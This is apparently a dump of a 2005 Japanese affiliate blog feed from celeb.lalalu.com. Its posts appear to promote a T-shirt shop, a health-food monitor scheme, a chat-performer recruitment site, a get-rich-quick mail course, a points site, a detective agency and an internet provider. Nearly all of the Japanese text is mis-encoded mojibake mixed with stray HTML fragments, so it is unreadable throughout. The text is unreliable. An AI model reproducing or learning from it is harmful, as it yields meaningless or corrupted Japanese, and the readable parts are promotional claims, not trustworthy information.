    - -ƒLƒ€ƒ^ƒNIc‚ּ’ם‚³‚ס‚ּƒuƒ‰ƒ“ƒh - -2005-05-17T12:51:37Z -2005-05-17T09:29:00Z -tag:celeb.lalalu.com,2005://1.112 -2005-05-17T09:29:00Z -¡‚r‚g‚t‚h‚o ‚n‚m‚k‚h‚m‚d ‚r‚g‚n‚o¡‚ֶ‚¢‚₪‚¨“X‚ׂ ‚י‚ס‚ֵ‚·‚×A‚±‚ּƒuƒ‰ƒ“ƒh... - -majo - - - -{|”\lה—p’B•–‚מ•סIH - -¡‚r‚g‚t‚h‚o ‚n‚m‚k‚h‚m‚d ‚r‚g‚n‚o¡‚ֶ‚¢‚₪‚¨“X‚ׂ ‚י‚ס‚ֵ‚·‚×A‚±‚ּƒuƒ‰ƒ“ƒhASMAP‚ּƒLƒ€ƒ^ƒN‚ּ’ם‚ֵƒAƒƒtƒg‘Iט‚ּ–״‘÷rל‚³‚ס‚ֶA˜Vלˆך•½‚³‚ס‚׃fƒUƒCƒi[‚נ–±‚‚ִ‚¢‚י´h‚ּƒVƒ‡ƒbƒvuSHUIP(ƒVƒ…ƒCƒbƒv)v‚ּצ®ƒTƒCƒg‚ָ‚ס‚ֵ‚·‚ֻB

    - -

    ֵ‹ƒAƒWƒAƒ“ƒeƒCƒXƒg‚ּ¬•¨‚ג—m•‚×—¬s‚ֱ‚ִ‚¢‚‚·‚¯‚ך‚ַA‚±‚¿‚ח‚ֽƒYƒoƒu“ת–{v‚נƒfƒUƒCƒ“ƒe[ƒ}‚ֹ‚µ‚½ƒJƒWƒ…ƒAƒ‹ƒAƒCƒeƒ€‚בµ‚ֱ‚ִ‚¢‚‚·B
    -‚»‚₪¾‚¦‚־AX‚ֵ‚ֽ‚ז‚­uNew Yorkv‚‚½‚¢‚ָ‰pך‚ּ•¶“‚טTƒVƒƒƒc‚נ’…‚ִ‚¢‚יl‚ׂ¢‚י‚¯‚ך‚ַAO‘‚ֹs‚­‚ֶA‹t‚ֹ“ת–{‚ּ•¶“‚טTƒVƒƒƒc‚נ©‚©‚¯‚½‚ט‚µ‚‚·‚ז‚ֻIi‘ו’ןAˆ׃–¡•s–¾‚¾‚¯‚ַB־j‚ A‚א‚¿‚כ‚ס‚±‚ּƒVƒ‡ƒbƒv‚ֵ‚ֽ‚»‚ס‚ָˆ׃–¡•s–¾‚ָTƒVƒƒƒc‚ׂ ‚י‚ם‚¯‚¶‚ב‚ָ‚­‚ִA‰ֶ–ה‚ֶ‚©‰װ‰‚ֶ‚¢‚ֱ‚½“`““I‚ָu˜av‚נƒ‚ƒ`[ƒt‚ֹ‚µ‚ִ‚¢‚‚·B³X‚ֽƒƒ“ƒYEƒJƒWƒ…ƒAƒ‹‚ּƒuƒ‰ƒ“ƒh‚ֵ‚·‚¯‚ך‚ַAƒ†ƒjƒZƒbƒNƒX‚ּƒTƒCƒY“WJ‚א‚ ‚י‚ּ‚ֵA—«‚ֹ‚אƒIƒXƒXƒ‚ֵ‚·‚זB

    - -

    ƒLƒ€ƒ^ƒN‚ֶ¾‚¦‚־cA‰½”N‚©‘O‚ֹH“¡ֳ‚ּ‚¨“X‚×L”צ‚ֹ‚ ‚ֱ‚½‚¯‚ַAֵ‹‹‚­‚ֹs‚ֱ‚½‚ח–³‚­‚ָ‚ֱ‚ִ‚½‚ָ‚Bƒ^ƒƒ“ƒg‚³‚ס–{l‚ּƒVƒ‡ƒbƒv‚ֱ‚ִ“ן‚µ‚¢‚ּ‚©‚ָB‚»‚₪‚¢‚₪ˆ׃–¡‚ֵ‚ֽƒtƒ[ƒƒXEƒZƒCƒR(¼“c¹q‚ּ‚¨“X)‚ֱ‚ִ’·‚¢‚ֵ‚·‚ֻ`B

    - -

    c˜b‚׈ם‚ך‚ִ‚µ‚‚ֱ‚½I(((((((^^;)
    -

    ]]> -w“‚µ‚ִu‹C‚ֹ“‚ֱ‚½‚ּ‚ֵ‚א‚₪1–‡—~‚µ‚¢Iv‚ֶv‚ֱ‚½‚חA
    -2Tװˆָ“א‚ֹƒRƒR«‚©‚ח’ַ‰ֱ’•¶‚·‚י‚ֶ‘——¿‚×–³—¿‚ֹ‚ָ‚ט‚‚·‚זB
    -“ת–{‚ּ”‚µ‚³‚נ’…‚יB˜a•—‚sƒVƒƒƒcISHUIP´hƒIƒ“ƒ‰ƒCƒ“ƒVƒ‡ƒbƒv

    ]]> -
    -
    - -SOUKEN (‘‡’NJ”­₪‹†) - -2005-05-08T18:36:32Z -2005-05-08T17:56:44Z -tag:celeb.lalalu.com,2005://1.111 -2005-05-08T17:56:44Z -ƒ‚ƒjƒ^[‘ו•וWIָ’P“o˜^‚ֵ10,000-100,000@‚f‚d‚sII “ֱ’ט•’... - -majo - - - -{ƒAƒ“ƒP[ƒgEƒ‚ƒjƒ^[‚ֵƒ|ƒCƒ“ƒgl“¾ - -ƒ‚ƒjƒ^[‘ו•וWIָ’P“o˜^‚ֵ10,000-100,000@‚f‚d‚sII

    - -

    “ֱ’ט•’—pH•i(ƒgƒNƒz)‚ג‹@”\«H•iJ”­‚ּˆ׳‚ּ—ױ°±‚נs‚ֱ‚ִ‚¢‚י‹@ײ‚ּSOUKEN(‘‡’NJ”­₪‹†)‚×Aƒ‚ƒjƒ^[‚נ•וW‚µ‚ִ‚¢‚‚·B

    - -

    ‚ַ‚ס‚ָ“א—e‚©‚ֶ¾‚₪‚ֶA‘וטH•iƒ[ƒJ[‚ָ‚ַ‚×J”­‚א‚µ‚­‚ֽש‚ֹ”ּ”„‚µ‚ִ‚¢‚י’NH•i‚נˆך’טתװH‚µ‚½‚ ‚ֶA₪‹†‚ֹ‚ִ’Nf’f‚גƒAƒ“ƒP[ƒg‚ֹ“‚¦‚י‚±‚ֶ‚ֵ׃—ח‚נ–ב‚¦‚‚·B(’ס‹‚³‚ך‚יH•i‚ֽש‚ֹˆְ‘S«ƒeƒXƒg‚×s‚ם‚ךA“תם“I‚ֹH‚׳‚ִ‚¢‚י‚א‚ּ‚ׂ‚ֶ‚ס‚ַ‚ֵ‚·)

    - -

    ˆך‰ƒ‚ƒjƒ^[‚ּ‰•ו‚ֹ‚ֽ‚¢‚­‚ֲ‚©‚ּמ€‚ׂ ‚ט‚‚·B
    -‚‚¸AHד‚ּ¸‚נ₪‹†w’טˆד‰@(`‹ז‹•׃)‚ֵs‚₪ˆ׳A‚»‚±‚ֹ—ˆ‰@‚ֵ‚«‚י‚±‚ֶB
    -”N—מ‚ֽ20`70־‚­‚ח‚¢‚‚ֵ‚ֵAˆָ‰÷‚ּ‚¢‚¸‚ך‚©‚ֹv‚¢“–‚½‚י•B(–¢¡—ֳE‰ֱ—ֳ’†‚ֵ‚א“o˜^‰ֲ)
    -
    E’Nf’f‚ֵ’†«‰–b’l‚ׂׂ‚¢A‚א‚µ‚­‚ֽˆָ‘O‚‚¢‚ֶ¾‚ם‚ך‚½‚±‚ֶ‚ׂ ‚יB
    -E“’l‚ׂ‚A‚א‚µ‚­‚ֽ‚‚¢Aˆָ‘O‚‚¢‚ֶ¾‚ם‚ך‚½‚±‚ֶ‚ׂ ‚יB
    -Eˆ³‚ׂ‚¢A‚א‚µ‚­‚ֽˆָ‘O‚‚¢‚ֶ¾‚ם‚ך‚½‚±‚ֶ‚ׂ ‚יB
    -E‚¨”§‚ּƒVƒ~EƒVƒ‚׋C‚ֹ‚ָ‚יB
    -E–‚ּ‰÷‚ּ‚­‚‚׋C‚ֹ‚ָ‚יB
    -E‘ּ‰–b‚ׂ‚B
    -EX”NתבQB
    -Ey“x•ײ”י‹C–¡B
    -E‘¾‚ט‹C–¡B
    -Eˆ««מב‡‚ׂ ‚יB

    - -

    ד‹LˆָO‚ֹ‚א‹C‚ֹ‚ָ‚יַף‚נ‚¨‚¿‚ּ•‚ֽ‘’k‚µ‚ִ‚‚י‚±‚ֶ‚א‚ֵ‚«‚‚·B
    -»‘דl‚ּ‘½‚­‚ֽ‰½‚ח‚©‚ּ¶ˆKµ•a—\”ץR‚ֶ¾‚ם‚ך‚ִ‚¢‚‚·‚ּ‚ֵAY“–‚·‚י•‚ֽ‘½‚¢‚©‚א‚µ‚ך‚‚¹‚ס‚ֻB

    - -

    ‚»‚µ‚ִ‹C‚ֹ‚ָ‚י•סV‚»‚ּ‘¼‚ּƒƒƒbƒg‚ֵ‚·‚×A
    -‚‚¸A’Nf’f‚×–³—¿‚ֵף‚¯‚ח‚ך‚‚·B(ƒf[ƒ^‚ֽ‘S‚ִ’m‚ח‚¹‚ִ‚­‚ך‚‚·‚µA¸‹‰‚ּ“א—e‚ֹ‚ֲ‚¢‚ִA¿–ג‚ֹ‚א“‚¦‚ִ‚­‚ך‚‚·B
    -‚ֹuƒ‚ƒjƒ^[v‚ֹ‚ִH‚·‚יH•iA’NH•i‚ֽ‚·‚׳‚ִ–³’ס‹‚³‚ך‚‚·B(—ב‚¦‚־ƒRƒƒXƒeƒ[ƒ‹‚ׂ‚‚ָ‚ח‚־AƒRƒƒXƒeƒ[ƒ‹’l‚׉÷‚ׂי‚ָ‚ַAר‰‚×ת‘ׂ‚ֵ‚«‚י‚א‚ּ‚ֵ‚·I)
    -‚»‚µ‚ִcuƒ‚ƒjƒ^[v‹¦—ֽ‚ּ׃—ח‹א‚ֽA’ם1–‰~‚©‚ח10–‰~(נ’”ן‚)
    -¦׃—ח‚ּz‚ֽA±“א—e‚גְ{תװ“™‚ֹ‚ז‚ט±–ˆ‚ֹˆ‚ָ‚ט‚‚·B

    - -

    ‚±‚±‚ֽ₪•i‚ּ”ּ”„‚ָ‚ַ‚ֽˆך״s‚ֱ‚ִ‚¢‚‚¹‚ס‚µAƒ‚ƒjƒ^[ˆֻ—‚נ‘S‚ִף‚¯‚ָ‚­‚ִ‚ֽ‚¢‚¯‚ָ‚¢‚ם‚¯‚ֵ‚ֽ‚ָ‚­Aנ‚ֹ‡‚₪‚א‚ּ‚נ‘I‚׳‚‚·‚ּ‚ֵA“o˜^‚¾‚¯‚ֵ‚א‚µ‚ִ‚¨‚­‚ֶ—ַ‚¢‚ֶv‚¢‚‚·‚זפ

    ]]> - - - - - -
    @‰•ו•–@ƒ‚ƒjƒ^[“o˜^
    ‚¨—F’B׀‰מ -
    ‰^‰c‰ן׀‘‡’NJ”­₪‹†
    - - -]]> -
    -
    - -ƒAƒCƒhƒ‹’a¶ITV (ƒ‰ƒCƒuƒ`ƒƒƒbƒg) - -2005-05-06T08:36:39Z -2005-05-06T08:33:48Z -tag:celeb.lalalu.com,2005://1.110 -2005-05-06T08:33:48Z -o”ֵ׀‚ּ‚װ‚ס‚©׀‚׃`ƒƒƒbƒgƒƒfƒB‚נ•וW’†I yƒAƒCƒhƒ‹’a¶ITVz‚ֽA’|“א‹q‚ג... - -majo - - - -{’‹־ƒiƒVIƒpƒ\ƒRƒ“‚ֵ‚¨d–פ - -o”ֵ׀‚ּ‚װ‚ס‚©׀‚׃`ƒƒƒbƒgƒƒfƒB‚נ•וW’†I

    - -

    yƒAƒCƒhƒ‹’a¶ITVz‚ֽA’|“א‹q‚גבֱ“ח‚©‚נ‚טE¬‘q—Dq‚ָ‚ַƒAƒCƒhƒ‹^W‚ּo”ֵ׀‚ֵ—L–¼‚ָw‚װ‚ס‚©׀x‚×וֳ‚·‚יƒ`ƒƒƒbƒg•ת‘—‹ַ‚ֵ‚·B(‚א‚¿‚כ‚סAƒmƒ“ƒAƒ_ƒ‹ƒg‚ֵ‚·‚זI)

    - -

    ‚±‚±‚ֽ­‚µ‘¼‚ֶ‚ֽˆב‚₪“ֱ’¥‚ׂ ‚ט‚‚·B‚»‚ך‚ֽu‘ׂ‹@•בvB‚ֹ20װˆָד‚ָ‚ַ‹K’ט‚נƒNƒƒA‚·‚י‚ֶAƒ†[ƒU‚ּƒAƒNƒZƒX‚×–³‚­‚ִ‚א•סV‚×”­¶‚µ‚‚·B‘ׂ‚ֱ‚ִ‚י‚¾‚¯‚ּװ‚א•סV‚×–ב‚¦‚י‚ָ‚ס‚ִנ‚µ‚¢‚ֵ‚·‚ז‚ֻB

    - -

    ‚‚½Aƒ^ƒCƒgƒ‹‚©‚ח‚א‘z‘‚ֵ‚«‚י‚ז‚₪‚ֹu”װ‘gv‚נu•ת‘—v‚µ‚ִ‚¢‚י‚ז‚₪‚ָ´o(‚½‚­‚³‚ס‚ּl‚׃`ƒƒƒbƒg‚נ‹’®‚µ‚ִ‚­‚ך‚י‚ֶ•סV‚ַׂ‚ס‚ַ‚ס‘‚¦‚ִ‚¢‚«‚‚·I)‚ֵAƒ^ƒƒ“ƒg‚גƒ‚ƒfƒ‹u–]‚ּl‚ֽDVD‚גƒfƒWƒ^ƒ‹^W‚ּƒƒ[ƒX‚ָ‚ַ|”\ˆ“®‚ּƒ`ƒƒƒ“ƒX‚א‚ ‚ט‚‚·Bש‚ֹƒ^ƒƒ“ƒgˆ“®‚נ‚µ‚ִ‚¢‚יl‚אQ‰ֱ‚ֵ‚«‚י‚ז‚₪‚ֹ‚ָ‚ֱ‚ִ‚¢‚י‚ּ‚ֵAƒAƒNƒZƒX”‚ֽ‚©‚ָ‚ט‚ ‚י‚ֶv‚¢‚‚·B‰ׂ‚®‚ֹ‚אA—L–¼‚ֹ‚ָ‚י‚ֹ‚א‹“¹‚ּƒ‰ƒCƒuƒ`ƒƒƒbƒg‚©‚אפ
    -

    ]]> - - - - - - - - -

    ‹‹\2,400ˆָד
    ‰•ו‘i16־ˆָד
    Wvת/U“ת––Y/—‚15“ת•¥
    ֵ’בUz\3000
    ‰^‰c‰ן׀‚װ‚ס‚©׀
    -¦U‚A‘—¯‚ָ‚ַ‚ּט”—¿‚ֽA‚װ‚ס‚©׀‚ו‰’S‚µ‚ִ‚­‚ך‚‚·B - - -]]> -
    -
    - -ir‘וw ` –²‚נ¶‚«‚יAK‚¹‚ָ‚¨‹א‚¿‚ײ‚ּ—· - -2005-05-06T08:30:30Z -2005-05-06T08:25:45Z -tag:celeb.lalalu.com,2005://1.109 -2005-05-06T08:25:45Z -u”’‚µ‚‚·B‚ָ‚÷A„‚×A‚½‚ֱ‚½‚Q”N‚ֵA”N‚Q‰­‰~‚ּyK‚¹‚ָ‚¨‹א‚¿z‚ֹ‚ָ‚ך‚½‚ּ... - -majo - - - -{–{“–‚©‚ָ`H‚ֵ‚אƒXƒSƒN‹C‚ֹ‚ָ‚י˜b - -u”’‚µ‚‚·B‚ָ‚÷A„‚×A‚½‚ֱ‚½‚Q”N‚ֵA”N‚Q‰­‰~‚ּyK‚¹‚ָ‚¨‹א‚¿z‚ֹ‚ָ‚ך‚½‚ּ‚©Hv
    -‚ָ`‚ס‚ִƒ^ƒCƒgƒ‹‚נ©‚½‚ח‚ֲ‚¢‚ֲ‚¢”`‚¢‚ִ‚µ‚‚₪„‚ֵ‚·B(־)

    - -

    ‚ֵ‚אƒlƒbƒg‚¾‚¯‚ֵ‚ֽ‚ָ‚­AuT§»‘דv‚גuTOKYO1Tװv‚ָ‚ַ13‚ֹf‚³‚ךA28“תװ‚ֵ1700–¼‚א\‚µ‚‚ׂ ‚ֱ‚½‚ֶ•·‚¢‚ִ‹C‚ֹ‚ָ‚ֱ‚½‚ּ‚ֵA‚ֶ‚ט‚ ‚¦‚¸ƒƒ‹ƒ}ƒK‚נ“ַ‚ס‚ֵ‚‚‚µ‚½BƒAƒ‹ƒoƒCƒg‚ֵ•¨‚נ”„‚ֱ‚½o±‚א‚ָ‚¢וֳׂ‚³‚ס‚×A‰‚‚ִ‚ּƒrƒWƒlƒX‚ֵ1‰­‰~ˆָד‰ׂ‚¢‚¾ƒmƒEƒnƒE‚נ‹ן‘ּ“I‚ֹ‹³צ‚µ‚ִ‚­‚ךAƒAƒtƒ^[ƒtƒHƒ[‚ֽ¶U•״‚¾‚»‚₪‚ֵ‚·B

    - -

    —ב‚¦‚־‚±‚ס‚ָ©o‚µ‚×cB(ˆָ‰÷”²ˆˆר—p‚ֵ‚·)
    -
    u21¢‹I^ƒrƒWƒlƒXv‚ּ6‚ֲ‚ּ”י
    -‹†‹ֹ‚ּƒrƒWƒlƒXƒ‚ƒfƒ‹‚נ׀‰מI@„‚א‚»‚ּ1‚ֲ‚©‚חn‚‚‚µ‚½B
    -‚א‚¿‚כ‚סAƒTƒ‰ƒ[ƒ}ƒ“‚גו•w‚ֵ‚א‚ֵ‚«‚י‚±‚ֶ‚־‚©‚טI

    -5‚ֲ‚ּu21¢‹I^ƒrƒWƒlƒXv‚נ‚²׀‰מ
    -„‚ֽ‚±‚ּ5‚ֲ‚נ‚ג‚ֱ‚ִ‚¢‚י‚¾‚¯‚ֹ‚·‚¬‚‚¹‚סI
    -iƒ^ƒl‚נ–¾‚©‚¹‚־Aָ’P‚·‚¬‚יAAAj

    -u–•W‚נ†‚ֹ‘‚­‚ְֶ»‚·‚יIv‚ֶ‚¢‚₪–‚–@‚ֶ3‚ֲ‚ּ——R
    -‘½‚­‚ּl‚×װˆב‚ֱ‚ִ‚¢‚י‚ֶ‚±‚כ–•W’ט‚ֽ››‚ּ‚½‚‚ֹ‚·‚י
    -ּ‚©‚ח“`‚ם‚י”י“`A‚±‚±‚ֹ‚ ‚טI

    -u‘ו‹א‚¿v‚‚‘Sˆץ‚ֹ‹₪’‚·‚יu2‚ֲ‚ּƒ‚ƒmv
    -‹פ‘R©‚ֲ‚¯‚½I@‚½‚װ‚סA‚ַ‚±‚ֹ‚א‘‚¢‚ִ‚¢‚ָ‚¢IH

    -c‹C‚ֹ‚ָ‚ט‚‚·B
    -

    ]]> -
    -
    -
    -

    ]]> -
    -
    - -‚½‚ּ‚µƒ[ƒ‹ - -2005-05-05T14:46:30Z -2005-05-04T18:18:35Z -tag:celeb.lalalu.com,2005://1.15 -2005-05-04T18:18:35Z -ֵ‹ƒƒjƒ…[ƒAƒ‹‚µ‚ִA]—ˆ‚ּƒTƒCƒg‚©‚חAƒ|ƒCƒ“ƒg‚×·‹אo—ˆ‚יƒTƒCƒg‚ֹ¶‚‚ך•ֿ... - -majo - - - -{ƒTƒCƒg‚ֵ—V‚ס‚ֵƒ|ƒCƒ“ƒgl“¾ - -ֵ‹ƒƒjƒ…[ƒAƒ‹‚µ‚ִA]—ˆ‚ּƒTƒCƒg‚©‚חAƒ|ƒCƒ“ƒg‚×·‹אo—ˆ‚יƒTƒCƒg‚ֹ¶‚‚ך•ֿ‚ם‚ֱ‚½u‚½‚ּ‚µƒ[ƒ‹v‚ֵ‚·B
    -ƒ|ƒCƒ“ƒg·‹אƒTƒCƒg‚ֶ‚µ‚ִ‚ֽAƒ|ƒCƒ“ƒg‚ֹ—Lרתְ‚ָׂ‚¢‚±‚ֶA’™‚‚½ƒ|ƒCƒ“ƒg‚נ·‹א‚·‚י‚ֶ‚«‚ֹ‘—‹אט”—¿‚×–³—¿‚ָ‚ַAƒ|ƒCƒ“ƒg‚ּ’™‚b”ד‚ׂ ‚ט‚‚·פ

    - -

    ƒTƒCƒg‚ֶ‚µ‚ִ‚ֽ]—ˆ‚ּ’‚טwNINJA‚­‚¶x‚ֲׂ‚¢‚½מ•סƒ[ƒ‹‚דֽ‚«‚‚·B(‰ןˆץ“o˜^‚ֹ‹»–¡‚ׂ ‚י‚ֶw’ט‚µ‚½“א—e‚ּ‚א‚ּ)‚­‚¶‚ֽ“–—‚ׂ»‚ּך‚ֵ‚ם‚©‚יƒXƒs[ƒh‚­‚¶‚ֵA‹‰״•i‚ד–‚½‚יƒ`ƒƒƒ“ƒX‚ׂ ‚ט‚‚·B(„‚ֽƒGƒAƒtƒƒbƒVƒ…ƒi[‚ד–‚½‚ט‚‚µ‚½I)
    -‰ןˆץ“o˜^‚µ‚ִ‚¢‚י‚¾‚¯‚ֵ–ˆ»‹א100–‰~‚ד–‚½‚יƒ`ƒƒƒ“ƒX‚אy‚µ‚‚ֵ‚·פ

    ]]> - - - - - - - -
    ‚”z“–ƒ|ƒCƒ“ƒgƒTƒCƒg ‚½‚ּ‚µƒ[ƒ‹·‹א—¦10P=1‰~
    ƒ|ƒCƒ“ƒgl“¾•–@ƒTƒCƒg‚נo—R‚µ‚½A‘—¿¿‹
    ƒVƒ‡ƒbƒsƒ“ƒO / ‰ןˆץ“o˜^‚ָ‚ַ
    ƒ|ƒCƒ“ƒgl“¾•p“x
    ƒ|ƒCƒ“ƒgנ·10000P`
    ‚¨—F’B׀‰מ100P
    ‰^‰c‰ן׀”®‰ן׀ƒ`ƒƒƒ“ƒXƒCƒbƒg
    - - -]]> -
    -
    - -ƒ}[ƒYƒG[ƒWƒFƒ“ƒg - -2005-04-19T09:56:56Z -2005-04-19T09:57:27Z -tag:celeb.lalalu.com,2005://1.101 -2005-04-19T09:57:27Z -‚¨“¾מ•סEE‚ֶ¾‚ֱ‚ִ—ַ‚¢‚ּ‚©–ְ‚₪‚ֶ‚±‚כ‚ָ‚ס‚ֵ‚·‚×Auƒ}[ƒYƒG[ƒWƒFƒ“ƒgv‚ֵ‚ֽA–ˆ... - -majo - - - -{ƒN[ƒ|ƒ“E„ˆרE‚¨“¾מ•ספ - -‚¨“¾מ•סEE‚ֶ¾‚ֱ‚ִ—ַ‚¢‚ּ‚©–ְ‚₪‚ֶ‚±‚כ‚ָ‚ס‚ֵ‚·‚×Auƒ}[ƒYƒG[ƒWƒFƒ“ƒgv‚ֵ‚ֽA–ˆ1–¼ְ’ט‚ֵA—lX‚ָƒgƒ‰ƒuƒ‹‚נ’²¸”ן–³—¿‚ֵ‰נˆ‚µ‚ִ‚­‚ך‚יƒLƒƒƒ“ƒy[ƒ“‚נְ{‚µ‚ִ‚¢‚‚·B
    -—ב‚¦‚־A—¼e‚ג—Fl‚ּs••s–¾AƒXƒg[ƒJ[A©’m‚ח‚’N‚©‚©‚ח‚ּ‹÷”—A•‚‹CAƒIƒƒIƒ¼‹\A™‚ׂח‚¹ƒ[ƒ‹‚ּ‘ט’²¸A‰ֻ‹ף¿‹¼‹\A“’®E“BAƒCƒ“ƒ^[ƒlƒbƒg‚ּf¦”ֲ‚ֵ‚ּ”מז’†Ag‘ׁ“d˜b‚ּ‚‚ֱ‚½‚­‚טƒTƒCƒg‚ָ‚ַ‚ּƒgƒ‰ƒuƒ‹‚©‚חAּ‚¨¢˜b‚ֹ‚ָ‚ֱ‚½‰¶t‚נ’T‚µ‚½‚¢A„‚ֽ‚ט‚ֹ‚ַ‚₪v‚ם‚ך‚ִ‚¢‚י‚ּ‚©’m‚ט‚½‚¢‚ֶ‚¢‚₪‚ז‚₪‚ָ‚±‚ֶ‚‚ֵA‰½׀‚א‚ּ–‹ֶׂ‚ֶ’סg‚µ‚ִ‚¢‚י‚½‚A—lX‚ָ“א—e‚ֹ‘־‰‚ֵ‚«‚‚·B

    - -

    וֳ‚µ‚ִ‚¢‚י‚ּ‚ֽ“ת–{ƒCƒ“ƒ^[ƒlƒbƒgמ•ס’²¸‹¦‰ן‚ֶ‚¢‚₪מ•ס’²¸ˆ“®‚נך–ו‚ֹs‚₪’c‘ּ‚ֵA”צs‚ג’£‚ט‚A‘fs’²¸‚ג•‚‹C’²¸‚ָ‚ַA]—ˆ‚ּ’²¸‹ֶ–±‚¾‚¯‚ֵ‚ָ‚­A“ֶ©‚ּ‹Zp‚ֶƒmƒEƒnƒE‚נg‚ֱ‚½ƒCƒ“ƒ^[ƒlƒbƒgמ•ס’²¸‚א•¹—p‚µ‚ִAƒCƒ“ƒ^[ƒlƒbƒg‚×—‚•¡G‚ָƒgƒ‰ƒuƒ‹‚א‘־‰‚׉ֲ”\‚ֵ‚·B

    - -

    –ג‘ט‰נˆ‚ֹ“–‚½‚טA’²¸ˆץ‚ֹ‚©‚©‚י“dװ’ְ‚גƒKƒ\ƒƒ“‘ד‚ָ‚ַ‚ּנ’”ן‚ֽ•‰’S‚·‚יך‡‚ׂ ‚ט‚‚·‚×A•‰’S‚·‚י•K—v«‚×o‚½ך‡‚ֽ–‘O‚ֹ•ס‚ׂ ‚טA‹–‘ר‚µ‚ִ‚©‚ח‚ּ’²¸‚ֹ‚ָ‚ט‚‚·Bˆֻ—“א—e‚ֹ‚ז‚ֱ‚ִ‚ֽנ’”ן‚א‘S‚ִ–³—¿‚ָ‚יƒP[ƒX‚ׂ ‚טA‚µ‚­‚ֽ’²¸‘O‚ֹא–¾‚µ‚ִ‚­‚ך‚‚·B

    - -

    ‰•ונ‚ּ‚׀‚ֶ‚ֲ‚ֶ‚µ‚ִAוֳ’c‘ּ‚ֵ‚ ‚י“ת–{ƒCƒ“ƒ^[ƒlƒbƒgמ•ס’²¸‹¦‰ן‚×w’ט‚·‚יƒeƒƒr‚גƒ‰ƒWƒI”װ‘gAG‚גV•·‚ָ‚ַ‚ּƒƒfƒBƒA”}‘ּ‚ֹuƒgƒ‰ƒuƒ‹‚נ•ר‚¦‚½”םQׂv‚ֶ‚µ‚ִo‰‰‚ֵ‚«‚י‚±‚ֶi“½–¼‚ֵOKIj‚ֶ‚ ‚ט‚‚·B

    - -

    ‰נˆ‚µ‚½‚¢”Y‚‚נ•ר‚¦‚ִ‚¢‚יl‚ֽ‰•ו‚µ‚ִ‚‚ִ‚ֽ”@‰½‚ֵ‚µ‚ו‚₪BƒƒfƒBƒA‚ֵז‚טד‚°‚י‚±‚ֶ‚בO’ס‚ָ‚חA–ג‘ט‰נˆ‚ֽװˆב‚¢‚ָ‚¢‚ֶv‚¢‚‚·‚זB

    - -

    ‚±‚¿‚ח«‚©‚ח“‚ֱ‚ִA
    -
    -¶‘₪‚ּu–³—¿E—L—¿‘’k‘‹v¨u–³—¿E—L—¿‘’k‚ֽ‚±‚¿‚חv‚נƒNƒƒbƒN‚·‚י‚ֶ‰•וƒtƒH[ƒ€‚ׂ ‚ט‚‚·B
    -

    ]]> - -
    -
    - -ƒƒ“ƒNƒNƒ‰ƒu - -2005-04-17T15:26:48Z -2005-04-17T15:17:59Z -tag:celeb.lalalu.com,2005://1.108 -2005-04-17T15:17:59Z -ƒƒ“ƒNƒNƒ‰ƒu‚ֽA„‚×10”N‹‚­g‚ֱ‚ִ‚¢‚יƒCƒ“ƒ^[ƒlƒbƒgƒvƒƒoƒCƒ_‚ֵ‚·B³X‚ֽMa... - -majo - - - -Eiˆְor–³—¿‚ּHPƒXƒy[ƒX/ƒuƒƒO - -ƒƒ“ƒNƒNƒ‰ƒu‚ֽA„‚×10”N‹‚­g‚ֱ‚ִ‚¢‚יƒCƒ“ƒ^[ƒlƒbƒgƒvƒƒoƒCƒ_‚ֵ‚·B³X‚ֽMacintosh‚ּƒ†[ƒUƒNƒ‰ƒu‚ֶ‚µ‚ִƒXƒ^[ƒg‚µ‚½‚א‚ּ‚ֵ‚·‚×A»‚ֽWindowsAUNIX‚ָ‚ַOS‚ֹײ‚ם‚ח‚¸—˜—pׂ‚ב‚¦‚ִ‚¢‚‚·BNTT‚©‚חƒxƒXƒgƒvƒƒoƒCƒ_EƒxƒXƒgי‹ֶ‚ָ‚ַv7‰ס‚ּ•\²‚נף‚¯‚י‚ָ‚ַA‚»‚ּM—«‚א•]‰¿‚³‚ך‚ִ‚¢‚‚·B

    - -

    ‘±ƒT[ƒrƒX‚ב¼׀‚ֶ”הr‚µ‚ִ‚א‚©‚ָ‚טˆְ‚¢‚±‚ֶ‚ֶA24װ‚ּ“d˜bƒTƒ|[ƒg‚ׂ ‚י‚±‚ֶA–³—¿‚ּƒz[ƒ€ƒy[ƒWƒXƒy[ƒX‚×100MB‚א‚ֲ‚¢‚ִ‚­‚י‚ָ‚ַƒT[ƒrƒX‚×—ַ‚¢‚ּ‚ֵ’·‚¢‚±‚ֶ‚¨¢˜b‚ֹ‚ָ‚ֱ‚ִ‚¢‚‚·B

    - -

    ƒƒ“ƒNƒNƒ‰ƒu‚ֹ‚ֽˆָ‰÷‚ּ‚ז‚₪‚ָƒT[ƒrƒX‚ׂ ‚ט‚‚·B

    - -

    ƒzƒXƒeƒBƒ“ƒOEƒT[ƒrƒX
    -70ם—ˆָד‚ּg‚¢‚ג‚·‚¢–³—¿‹@”\‚וt‚¢‚ִAWeb&Mail‚ּTotal‚ֵ1GBA“ֶ©ƒhƒƒCƒ“AMailƒAƒJƒEƒ“ƒg200ֲI‚ֵ3,700‰~

    - -

    ƒvƒ‰ƒCƒx[ƒgEƒvƒ‰ƒ“
    -ƒEƒBƒ‹ƒXƒ`ƒFƒbƒJ[‚ָ‚ַמ–{‹@”\‚וt‚¢‚ִAWeb&Mail‚ּTotal‚ֵ120MBAƒhƒƒCƒ“—¿‚‚ֵ1,000‰~I(”Nˆך‡•¥‚¢‚¾‚ֶ9,700‰~I)

    - -

    ƒhƒƒCƒ“Eƒ[ƒ‹
    -–³—¿ƒEƒBƒ‹ƒXƒ`ƒFƒbƒJ[•t‚«AƒhƒƒCƒ“”Nװˆ”ן700‰~A1ƒ[ƒ‹ƒAƒhƒƒXz100‰~I
    -¦g‘ׁ‚ֵ‚אg‚¦‚‚·B

    - -

    ƒhƒƒCƒ“Eƒp[ƒLƒ“ƒO(HPל¬‚ֽ‚‚¾ז‚¾‚¯‚ַAƒhƒƒCƒ“‚נז“¾‚µ‚ִAƒL[ƒv‚µ‚ִ‚¨‚«‚½‚¢I‚ֶ‚¢‚₪ˆ׳‚ּƒT[ƒrƒX‚ֵ‚·)
    -ז“¾”ן–³—¿AƒhƒƒCƒ“ˆ”ן‚ֽ[.com/.net/.org/.info/.biz]‚×700‰~A[.jp/.co.jp/.etc]‚×3000‰~Iַ—÷”Nװˆ”ן100‰~I

    - -

    ƒƒ“ƒNƒNƒ‰ƒuƒCƒ“ƒ^[ƒlƒbƒg
